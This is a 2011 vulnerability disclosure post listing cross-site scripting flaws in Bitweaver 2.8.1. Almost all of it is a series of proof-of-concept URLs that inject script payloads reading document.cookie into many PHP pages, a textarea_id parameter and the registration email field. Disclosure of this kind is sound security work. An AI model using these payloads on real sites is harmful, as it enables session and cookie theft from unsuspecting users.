Bitweaver 2.8.1 Multiple Cross-site Scripting Vulnerabilities

sschurtz

Bitweaver 2.8.1 Multiple Cross-site Scripting Vulnerabilities

Posted:29 Sep 2011 (06:34 UTC)
Hi,

I will inform you about some XSS vulernabilities in Bitweaver 2.8.1:

target/bitweaver/users/register.php/"<script>alert(document.cookie)</script>
target/bitweaver/blogs/rankings.php/"<script>alert(document.cookie)</script>
target/bitweaver/articles/edit.php/"<script>alert(document.cookie)</script>
target/bitweaver/articles/list.php/"<script>alert(document.cookie)</script>
target/bitweaver/calendar/index.php/"<script>alert(document.cookie)</script>
target/bitweaver/events/list_events.php/"<script>alert(document.cookie)</script>
target/bitweaver/events/index.php/"<script>alert(document.cookie)</script>
target/bitweaver/pigeonholes/list.php/"<script>alert(document.cookie)</script>
target/bitweaver/fisheye/index.php/"<script>alert(document.cookie)</script>
target/bitweaver/recommends/index.php/"<script>alert(document.cookie)</script>
target/bitweaver/rss/index.php/"<script>alert(document.cookie)</script>
target/bitweaver/fisheye/list_galleries.php/"<script>alert(document.cookie)</script>
target/bitweaver/tags/"<script>alert(document.cookie)</script>
target/bitweaver/stencils/index.php/"<script>alert(document.cookie)</script>
target/bitweaver/stencils/list_stencils.php/"<script>alert(document.cookie)</script>
target/bitweaver/wiki/orphan_pages.php/"<script>alert(document.cookie)</script>
target/bitweaver/users/remind_password.php/"<script>alert(document.cookie)</script>
target/bitweaver/blogs/list_blogs.php/"<script>alert(document.cookie)</script>
target/bitweaver/liberty/list_content.php/"<script>alert(document.cookie)</script>

target/bitweaver/quicktags/special_chars.php?textarea_id=');"/><script>alert(document.cookie);</script>

target/bitweaver/users/register.php -> Email -> '"<script>alert(document.cookie)</script> -> Register

Best Regards,

sschurtz